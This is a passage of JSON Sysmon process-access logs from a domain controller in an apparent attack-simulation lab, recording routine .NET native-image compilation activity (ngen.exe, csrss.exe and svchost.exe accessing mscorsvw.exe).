05:58:41.965","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-048C-5F25-0000-0010890E0E00}","TargetProcessId":"1204","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7026,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:42.011\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-048C-5F25-0000-001005120E00}\r\nTargetProcessId: 2856\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:42.011","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-048C-5F25-0000-001005120E00}","TargetProcessId":"2856","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7027,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:42.011\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-048C-5F25-0000-001005120E00}\r\nTargetProcessId: 2856\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:42.011","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-048C-5F25-0000-001005120E00}","TargetProcessId":"2856","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7028,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:42.027\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0492-5F25-0000-00105F7A0E00}\r\nTargetProcessId: 2856\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:42.027","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0492-5F25-0000-00105F7A0E00}","TargetProcessId":"2856","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7029,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:42.105\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-047C-5F25-0000-0010A7FC0C00}\r\nTargetProcessId: 2540\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:42.105","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-047C-5F25-0000-0010A7FC0C00}","TargetProcessId":"2540","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7030,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:42.105\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-047C-5F25-0000-0010A7FC0C00}\r\nTargetProcessId: 2540\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:42.105","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-047C-5F25-0000-0010A7FC0C00}","TargetProcessId":"2540","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7031,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:42.121\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0492-5F25-0000-00104C7E0E00}\r\nTargetProcessId: 2540\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:42.121","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0492-5F25-0000-00104C7E0E00}","TargetProcessId":"2540","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7032,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:42.246\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0492-5F25-0000-0010A6820E00}\r\nTargetProcessId: 2480\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:42.246","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0492-5F25-0000-0010A6820E00}","TargetProcessId":"2480","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNE